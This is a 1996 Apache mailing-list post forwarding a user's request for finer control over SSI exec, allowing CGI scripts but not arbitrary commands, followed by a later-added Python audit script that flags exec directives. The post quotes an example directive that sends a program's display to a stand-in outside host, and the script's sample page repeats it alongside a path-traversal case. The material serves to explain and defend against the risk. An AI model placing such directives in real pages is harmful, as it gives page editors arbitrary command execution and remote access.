httpd-dev mailing list archives

From Rob Hartill <r...@imdb.com>
Subject IncludesNOEXEC: finer control needed (fwd)
Date Tue, 30 Apr 1996 00:38:34 GMT

Not acked.

Whatever happened to this idea?
I remember offering a patch a long time ago only for the idea to
get vetoed. I think Andy proposed a patch for this too.

-=-=-=-=-=-=-=-

Date: Mon, 29 Apr 96 18:26:10 MDT
Message-Id: <9604300026.AA26194@sfi.santafe.edu>
From: Nelson Minar <nelson@santafe.edu>
To: apache-bugs@mail.apache.org
Subject: IncludesNOEXEC: finer control needed

Thanks for all the great work on Apache! It's a very nice server, I'm
really happy with it. One small security control that would be nice..

I'm setting up a web site where I trust the people who are editing the
Web pages (Artificial Life Online, http://alife.santafe.edu/). I want
to allow them to have server includes, including execs of CGI scripts.
However, I don't want them to have the full power of exec cmd. I.e.:
  <!--#exec cgi="/cgi-bin/my-nice-stuff.cgi"-->
but not
  <!--#exec cmd="emacs -display some.bad.place.net:0"-->
The nice thing is that cgi="" is somewhat restricted - the script has
to be a valid cgi (in the right directory, for instance), but the cmd
can be an arbitrary thing.

I don't see any option for this now - it's either no exec at all or
both CGI and cmd. One possible solution is to have <Options NOEXECGI>
and <Options NOEXECCMD> as separate options, or something even cleverer.

Is this something you can do easily? Would it be more likely if I
wrote a patch and submitted it?

thanks again,
  Nelson
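
An audit sketch for the cgi/cmd distinction described in the message above, added here and not part of the original post or of Apache: it parses SSI `#exec` directives in page source, denies `cmd=`, and allows `cgi=` only under an assumed `/cgi-bin/` prefix. The function name, the prefix and the sample page are constructed for illustration.

```python
import re

# SSI directive syntax: <!--#element attr="value" ... -->
DIRECTIVE = re.compile(r'<!--#(\w+)\s+(.*?)\s*-->', re.S)
ATTR = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))')

ALLOWED_CGI_PREFIX = "/cgi-bin/"  # assumption: the site's CGI directory

# Constructed sample page; the first two directives are the ones quoted in the message.
SAMPLE = '''<html>
<!--#exec cgi="/cgi-bin/my-nice-stuff.cgi"-->
<!--#exec cmd="emacs -display some.bad.place.net:0"-->
<!--#exec cgi="/cgi-bin/../private/tool.cgi"-->
<!--#include virtual="/footer.html"-->
</html>
'''


def audit_ssi(text):
    """Return (line, verdict, attr, value) for each attribute of every #exec directive."""
    findings = []
    for m in DIRECTIVE.finditer(text):
        if m.group(1).lower() != "exec":  # lenient on case so nothing is missed
            continue
        line = text.count("\n", 0, m.start()) + 1
        for a in ATTR.finditer(m.group(2)):
            name = a.group(1).lower()
            value = a.group(2) or a.group(3) or a.group(4) or ""
            if name == "cmd":
                verdict = "deny"  # arbitrary command, the case the message wants blocked
            elif (name == "cgi" and value.startswith(ALLOWED_CGI_PREFIX)
                  and ".." not in value.split("/")):
                verdict = "allow"  # script inside the designated CGI directory
            else:
                verdict = "review"  # cgi outside the prefix, traversal, or unknown attribute
            findings.append((line, verdict, name, value))
    return findings


if __name__ == "__main__":
    for line, verdict, name, value in audit_ssi(SAMPLE):
        print(f"line {line}: {verdict:6} exec {name}={value!r}")
```
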

